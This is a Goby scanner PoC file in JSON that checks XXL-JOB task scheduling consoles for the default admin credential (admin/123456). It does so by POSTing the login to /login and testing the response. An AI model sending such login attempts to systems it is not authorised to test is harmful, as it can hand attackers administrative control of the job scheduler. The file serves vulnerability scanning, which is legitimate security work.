Goby/json/XXL-JOB 任务调度中心 后台默认弱口令.json

60 lines
2.2 KiB
JSON

{
"Name": "XXL-JOB 任务调度中心 后台默认弱口令",
"Level": "2",
"Tags": [],
"GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "userName=admin&password=123456"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "500",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-03-17 12:24:54",
"GobyVersion": "1.8.237"
}